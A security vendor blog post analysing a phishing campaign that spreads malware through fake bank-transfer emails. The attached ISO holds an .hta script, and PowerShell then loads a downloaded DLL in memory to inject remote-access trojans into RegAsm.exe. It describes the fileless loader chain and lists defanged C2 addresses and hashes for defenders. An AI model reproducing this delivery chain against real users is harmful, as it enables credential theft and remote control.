AhnLab Security Emergency response Center (ASEC) has discovered a phishing campaign that propagates through spam mails and executes a PE file (EXE) without creating the file into the user PC. The malware attachment in the hta extension ultimately executes malware strains such as AgentTesla, Remcos, and LimeRAT. This blog post will explain the distribution process flow from the spam mail to the final binary, as well as the techniques employed.
Figure 1 shows the main text of the spam mail distributing the malware. The email is disguised as a bank transfer notice. Inside the attached ISO image file is the script file (.hta) disguised as the transfer notice (see Figure 2). The hta file is a script file run through mshta.exe, a Windows application.
Figure 1. Phishing email text
Figure 2. Malicious script (.hta) within the attached iso fileFigure 3 shows evidence of the malicious hta file being executed through a detection diagram in AhnLab EDR. Through the diagram, one can see a suspicious process tree where the mshta.exe process executes cmd.exe, powershell.exe, and RegAsm.exe in order.
Figure 3. Evidence of the hta file being executedFigure 4 shows the PowerShell command executed by mshta.exe. Through syntax interpretation of the PowerShell script, it can be identified that the code requests a string type data from the server (DownloadString), decodes the data (FromBase64string), and then loads the said data (CurrentDomain.Load) to call a certain function (‘VAI’). This method does not create the binary into a PE file, but it is a fileless method executing the binary in the memory area of PowerShell.
Figure 4. PowerShell script executed through mshta.exe (payload download and memory load features)Figure 5 shows the data that the PowerShell script requests from the C2 confirmed through a browser. As identified through the PowerShell script, the data reveals a PE file (DLL) upon being decoded in Base64.
Figure 5. Data downloaded from the C2 (encoded DLL)Figure 6 shows the features of the decoded DLL including downloading the final binary from the C2 and injecting it into RegAsm.exe, a normal Windows process. Thus, the final malware strain is run through RegAsm.exe. Figure 7 is the EDR screen which shows the DLL feature involving PowerShell.exe injecting into RegAsm.exe. It was mentioned in the CYBLE blog that Remcos, AgentTesla, LimeRAT, etc. were downloaded as the final binary in this phishing campaign. [1]
Figure 6. Features of the decoded DLL (downloading the ultimate binary and injection)
Figure 7. Powershell.exe performing injection into RegAsm.exeIn this post, ASEC covered the fileless distribution method of a malware strain through emails using evidential data from EDR. The threat actor has carefully disguised the email and files as bank transfer statements. Thus, seeing from just the contents of the email, it is difficult to tell it apart from normal ones. When opening attachments to emails, users must check if it contains an executable file extension that has the potential of being a malware strain. They should also employ security products to check access from threat actors and control it.
[IOC]
-
Behavior Detection
Connection/EDR.Behavior.M2650
Execution/MDP.Powershell.M10668 -
File Detection
Downloader/Script.Generic
Trojan/Win.Generic.R526355 -
URL & C2
hxxps[:][/][/]cdn[.]pixelbin[.]io[/]v2[/]red-wildflower-1b0af4[/]original[/]hta[.]txt
hxxp[:][/][/]195[.]178[.]120[.]24[/]investorbase64[.]txt - MD5
43e75fb2283765ebacf10135f598e98c (.hta)
540d3bc5982322843934504ad584f370 (.dll)
AhnLab EDR protects the endpoint environment by delivering behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting. For more information about the product, please visit our official website.
The post Tracking Fileless Malware Distributed Through Spam Mails appeared first on ASEC BLOG.
Article Link: https://asec.ahnlab.com/en/56512/